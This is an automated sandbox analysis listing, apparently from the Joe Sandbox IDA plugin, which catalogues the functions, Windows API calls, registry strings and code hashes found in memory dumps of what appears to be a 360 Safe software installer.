API String ID: 431132790-4230853747
Opcode ID: c331919610bae9f0bae759b44ec8b3bffbaca9518d6a4925e332ef7cb8e6da33
Instruction ID: e7cf413ecb0e9e4a9f987c334afb29f0396fffe6cd2d9156e244778195b27798
Opcode Fuzzy Hash: c331919610bae9f0bae759b44ec8b3bffbaca9518d6a4925e332ef7cb8e6da33
Instruction Fuzzy Hash: 71F04435E04226D7DB14FBF48E03FBF76749F11B60F140274A713A61D5EAB05A82DA94

Function 00A7E7D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,00A7E9A6,?), ref: 00A7E80F

Part of subcall function 00A7E9E0: _memset.LIBCMT ref: 00A7EA12
Part of subcall function 00A7E9E0: _wcsncpy.LIBCMT ref: 00A7EA29
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA3C
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA53
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA66
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA7D
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EA90
Part of subcall function 00A7E9E0: _wcsncat.LIBCMT ref: 00A7EAA7
Part of subcall function 00A7E9E0: GetActiveWindow.USER32 ref: 00A7EAB7
Part of subcall function 00A7E9E0: MessageBoxW.USER32(00000000), ref: 00A7EABE
Part of subcall function 00A7E9E0: __wcsnicmp.LIBCMT ref: 00A7EADA
Part of subcall function 00A7E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00A7EB0E

Strings

360, xrefs: 00A7E7F9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
String ID: 360
API String ID: 4220467963-1990796034
Opcode ID: 48ba895e1fb60215f48773b5fc21f19d7cbd3586e651e92f49cc5715e8bd031a
Instruction ID: 4bec71327502b57966da7d3dd09c2922e1bc5ff073f297cde2c700317498e68e
Opcode Fuzzy Hash: 48ba895e1fb60215f48773b5fc21f19d7cbd3586e651e92f49cc5715e8bd031a
Instruction Fuzzy Hash: 1AE0D8722553107BDA20E7109D0AFDBA3CCDF5875AF10C87BF609E2080E7B0981487A7

Function 00A74410 Relevance: 3.2, APIs: 2, Instructions: 226COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00A74728,00000000,00000000,00000CCC,00000040), ref: 00A74576

Part of subcall function 00A73E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00A74DC5,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A73E9B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 11202f03aacfc0ee3fcef68d56221a0a959ae0bb993589fa85621cca355015e6
Instruction ID: 9d48c072790c6c4119bcf77808cd559a9c7255716a04933e5765c10252cfbb8d
Opcode Fuzzy Hash: 11202f03aacfc0ee3fcef68d56221a0a959ae0bb993589fa85621cca355015e6
Instruction Fuzzy Hash: 8F715872A04702AFD714DF68DD80A6AB7E5FB88310F58CA2DF85883741E735ED548B92

Function 00AA8119 Relevance: 3.1, APIs: 2, Instructions: 141COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00AA816F
ShowWindow.USER32(?,?), ref: 00AA81F0

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ClientRectShowWindow
String ID:
API String ID: 2134488367-0
Opcode ID: 29c265a27e0d08e4eefbd81eb37a89a549e692178d041584f68a942fff0adb79
Instruction ID: 59804a2bd46f2e3df54d99019c40fb5c80f0af19b77152a2c01c549ccf035994
Opcode Fuzzy Hash: 29c265a27e0d08e4eefbd81eb37a89a549e692178d041584f68a942fff0adb79
Instruction Fuzzy Hash: 5E512A71900209AFCB10DFA4C888DEEBBB8FF59344B144559F856DB2A1EB35DA46CF50

Function 00A75B50 Relevance: 3.1, APIs: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,?,00000000,?,?,?), ref: 00A75B70
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,?), ref: 00A75BC9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$PointerSize
String ID:
API String ID: 3549600656-0
Opcode ID: f6b59bcf6bdbebebc063f7f34d38cf6db94281b0434562df5a5ca762cfff4dfd
Instruction ID: a5d3cf1a519cbbb26fcd951edb8a47201cca09d6d6f785391bbe170ae5b7ad26
Opcode Fuzzy Hash: f6b59bcf6bdbebebc063f7f34d38cf6db94281b0434562df5a5ca762cfff4dfd
Instruction Fuzzy Hash: CB21F032B003045BD7109F7AEC80B1BB7D9EBC4711F89847AE90CD3240EA76EC098762

Function 00AE0001 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 00AE00AC
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AE00EF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 7f313525271d3959348dc6e9b227cb81cc2c30880c5c277e83eef042df913ec5
Instruction ID: 45ef38c1a333c5e507a6f6331703a8831caf59730e76a01d970107d1d175f63d
Opcode Fuzzy Hash: 7f313525271d3959348dc6e9b227cb81cc2c30880c5c277e83eef042df913ec5
Instruction Fuzzy Hash: B0316B71A002499FDB30CFA6CC50BEEB778FF45315F254539E858EB282EB7099468B10

Function 00AC20A9 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AC20B3

Part of subcall function 00AA7451: BeginPaint.USER32(?,?), ref: 00AA746E

GetClientRect.USER32(?,?), ref: 00AC20E0

Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387

Part of subcall function 00AB6537: GetWindowRect.USER32(?,00000000), ref: 00AB6554

Part of subcall function 00AC1F15: __EH_prolog3.LIBCMT ref: 00AC1F1C
Part of subcall function 00AC1F15: IsWindowEnabled.USER32(?), ref: 00AC1F26
Part of subcall function 00AC1F15: GetClientRect.USER32(?,?), ref: 00AC1F5D
Part of subcall function 00AC1F15: GetWindowTextW.USER32(?,00000000,00000080), ref: 00AC1FA2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: RectWindow$Client$BeginCompatibleCreateEnabledH_prolog3H_prolog3_ObjectPaintSelectTextViewport
String ID:
API String ID: 2602395704-0
Opcode ID: 9e66f35f998641bf215e5eac1ba8c880b731fe7261790f46bbcff2a8f79aab14
Instruction ID: 7ef2dcea93987d1450ef3adb9a9c7b03e16de624eab27c701b18c36bb64faaa4
Opcode Fuzzy Hash: 9e66f35f998641bf215e5eac1ba8c880b731fe7261790f46bbcff2a8f79aab14
Instruction Fuzzy Hash: B5117971D00618DADF21EBA5C981FAEFBBAAF59300F11800EE14AA7162CF305A01DB61

Function 6C5E4D0B Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001,?,?,?,00000000), ref: 6C5E4D23
CreateWindowExW.USER32(?,00000000,?,?,?,00000002,?,?,?,00000000,?,6C703338), ref: 6C5E4D94

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CreateErrorLastWindow
String ID:
API String ID: 3732789607-0
Opcode ID: 588f52e849d6806f6ca2bbdc58e7028fa4e97c71e7176d1ab30691f3a8b4e870
Instruction ID: d11c50fe425511c741914b5bc85900bef311942ee5f63e9e60478a28ed2ceb72
Opcode Fuzzy Hash: 588f52e849d6806f6ca2bbdc58e7028fa4e97c71e7176d1ab30691f3a8b4e870
Instruction Fuzzy Hash: 5E110671200209EFDB018F95CE05FEA77B9EB4C314F058129BD549A6A0D7B4E860CBA4

Function 00AC56BD Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E), ref: 00AC56D5
CreateWindowExW.USER32(?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00AC5746

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateErrorLastWindow
String ID:
API String ID: 3732789607-0
Opcode ID: 50d9da87f0a648f61388eaa81ffb385885bb80077fd81f6ea880bd72e0d59b0a
Instruction ID: 7338a609c390c3083f15933a7b8a96ef0ce2a8cb332519eda52a84264d4b487c
Opcode Fuzzy Hash: 50d9da87f0a648f61388eaa81ffb385885bb80077fd81f6ea880bd72e0d59b0a
Instruction Fuzzy Hash: 25114832500209AFEB109F65CD05FAA3BA9EF48710F058569FC05971A0E774ECA0CFA0

Function 00A8DB68 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00A8DBA8

Part of subcall function 00AF4656: RaiseException.KERNEL32(?,?,?,00A780B1,?,?,?,?,?,00A780B1,00B4F5B8,00B4F5B8), ref: 00AF4698

_wcsncpy.LIBCMT ref: 00A8DBBE

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ExceptionException@8RaiseThrow_wcsncpy
String ID:
API String ID: 3304455579-0
Opcode ID: 2ff27c77a40c7b52b708e07355f1669cb9d89717301c62e57df2741f9729aa5a
Instruction ID: 1266e2b570077bd42284c11b69ffc0ea5101d2813d18d4c09519cfde3e054e1a
Opcode Fuzzy Hash: 2ff27c77a40c7b52b708e07355f1669cb9d89717301c62e57df2741f9729aa5a
Instruction Fuzzy Hash: E301F9722002046EDB24BFA8DD86E7AF7ECEF49340B11483FF649CB1D1EAB098408750

Function 00AC2F2F Relevance: 3.0, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AC2F39

Part of subcall function 00AA7451: BeginPaint.USER32(?,?), ref: 00AA746E

GetClientRect.USER32(?,?), ref: 00AC2F66

Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387

Part of subcall function 00AB6537: GetWindowRect.USER32(?,00000000), ref: 00AB6554

Part of subcall function 00AA7395: BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 00AA73B8
Part of subcall function 00AA7395: SelectObject.GDI32(00000000,?), ref: 00AA73C3
Part of subcall function 00AA7395: DeleteDC.GDI32(00000000), ref: 00AA73E0

Part of subcall function 00AA747C: EndPaint.USER32(?,?), ref: 00AA748C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ObjectPaintRectSelect$BeginClientCompatibleCreateDeleteH_prolog3_ViewportWindow
String ID:
API String ID: 2413813215-0
Opcode ID: 772db08df751d939a87af08af869c7cdd1bc27362df5591258f652278b95e6aa
Instruction ID: 98a04be6d83bc2dcdf40ead5ebdcee21789456aafa44356fc1c4e13db042b12a
Opcode Fuzzy Hash: 772db08df751d939a87af08af869c7cdd1bc27362df5591258f652278b95e6aa
Instruction Fuzzy Hash: 28113A71C00619EFDF219BD0CD41DAEFBB9FF18304F008459E58A67561DB726A15DB20

Function 00AE2080 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00A8898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00A889A8

InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00ADEAA4,?,?,00100000,00000000,0000008C), ref: 00AE20EE

Part of subcall function 00A88940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A88967

Strings

SOFTWARE\360Safe\softmgr\dio, xrefs: 00AE20A6, 00AE20DD

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateCriticalInitializeOpenSection
String ID: SOFTWARE\360Safe\softmgr\dio
API String ID: 2223640745-1814773269
Opcode ID: 673b4aa4dbc2fedc9a08aa208c22f37a688953575003f17b120fc9f38d24c15b
Instruction ID: 24e60b45a2f5f82e3afa1f8b4d66e7e372f2b52ff479f3d2ce5e6fdaa7672734
Opcode Fuzzy Hash: 673b4aa4dbc2fedc9a08aa208c22f37a688953575003f17b120fc9f38d24c15b
Instruction Fuzzy Hash: C4017CB0640709AFD3309F598CC1967FBECFF18751390492EE19AC3A91DA70A9048720

Function 00A8ADC4 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A8ADE3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000004), ref: 00A8ADF3

Part of subcall function 00A8995E: __EH_prolog3_catch.LIBCMT ref: 00A89965

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileH_prolog3H_prolog3_catchModuleName
String ID:
API String ID: 749528002-0
Opcode ID: b3d90422fc2cb1b183feabbecbf760e8cf7c51e7155e69e53592d87f755416f2
Instruction ID: ad637fca01a6f35ca3ce7b1e5e3157dea249fd1fb9a51d98a777bb71f764b6ce
Opcode Fuzzy Hash: b3d90422fc2cb1b183feabbecbf760e8cf7c51e7155e69e53592d87f755416f2
Instruction Fuzzy Hash: DA01717260430C9BEB64EFA4DD46BBEB3A4FF04711F50482AF625971D1EF706A08CA50

Function 00AA65CA Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00AA65F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00AA65FD

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Rect$ClientInvalidate
String ID:
API String ID: 645284650-0
Opcode ID: 9f06e130793caeb0d2d41488e930eb379bb99de58ea4e7789b7fde29ff5922a6
Instruction ID: 03e13c2cef38d7884402d55114be673b3a3b4e92a4b551aabec20e834f964d90
Opcode Fuzzy Hash: 9f06e130793caeb0d2d41488e930eb379bb99de58ea4e7789b7fde29ff5922a6
Instruction Fuzzy Hash: 9EF08771800604ABCB21DF5AC8449AFFFFAEFE6700B10852EE156A3160DB70A940CF50

Function 00A93C23 Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A93C2A
FreeLibrary.KERNEL32(?,00000004), ref: 00A93C51

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FreeH_prolog3Library
String ID:
API String ID: 1631603194-0
Opcode ID: 60fef726f2dbd1e454dc3fb92262b6d06e7fb8e9f99c1ad9c8ec6bb20736ff58
Instruction ID: b5c2950cd18aca9a598cb615f99a41d436f6f81572bc00429a90f38a4c136b29
Opcode Fuzzy Hash: 60fef726f2dbd1e454dc3fb92262b6d06e7fb8e9f99c1ad9c8ec6bb20736ff58
Instruction Fuzzy Hash: 41F0A435A00B559BDF24BFB5DE426AA77E4BF00301B00486DB39697191DF70A985DB50

Function 00A874B2 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE(?,?), ref: 00A874D1
CoCreateInstance.OLE32(?,?,?,00B2E8A0), ref: 00A874E9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 41ca528adc3799c718659b34f392c6a5c3aadc4bd7725cb2ff88e79a64343efa
Instruction ID: d516a93338e48abccb9ec9cef3eca2d91bfe62e9d637f5356a16d09a2a5324bf
Opcode Fuzzy Hash: 41ca528adc3799c718659b34f392c6a5c3aadc4bd7725cb2ff88e79a64343efa
Instruction Fuzzy Hash: 88F01232600249EB8B10EFA9DD49DDFBBBCEB4D611B50406AB915E3150DE74EA05C761

Function 00A875A2 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE(?,?), ref: 00A875C1
CoCreateInstance.OLE32(?,?,?,00B2E8B0), ref: 00A875D9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
